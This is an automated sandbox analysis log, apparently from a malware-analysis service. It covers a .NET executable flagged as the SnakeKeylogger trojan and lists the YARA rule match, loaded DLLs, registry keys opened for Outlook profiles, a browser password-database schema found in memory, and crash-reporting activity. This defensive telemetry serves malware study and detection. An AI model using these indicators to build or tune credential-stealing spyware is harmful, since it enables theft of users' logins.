                          Source: Process Memory Space: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe PID: 6764, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, -c.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, -c.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, --.csCryptographic APIs: 'TransformFinalBlock'
                          Source: classification engineClassification label: mal100.troj.spyw.winEXE@2/5@3/3
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeMutant created: NULL
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6764
                          Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\0c527140-ec93-4d74-952c-f67b035320faJump to behavior
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002CA3000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002CF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeReversingLabs: Detection: 65%
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeFile read: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe "C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe"
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6764 -s 2620
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006248000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Core.pdbP source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.ni.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006211000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.ni.pdbRSDS source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.ni.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006211000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Configuration.pdbh source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.ni.pdbRSDS source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Security.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.pdbMZ source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.ni.pdbRSDS# source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Core.ni.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: Microsoft.VisualBasic.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Windows.Forms.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Web.Extensions.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.000000000625D000.00000004.00000020.00020000.00000000.sdmp, WER1929.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.00000000061DE000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.pdb\t source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.ni.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006211000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Core.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Windows.Forms.pdbSystem.ni.dllp source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.ni.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Core.ni.pdbRSDS source: WER1929.tmp.dmp.12.dr
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_00EC9C30 push esp; retf 00F3h0_2_00EC9D55
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_067025C0 pushad ; iretd 0_2_06702701
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_06708387 push es; iretd 0_2_067083AC
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 0_2_067079A3 push es; iretd 0_2_067079A4
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
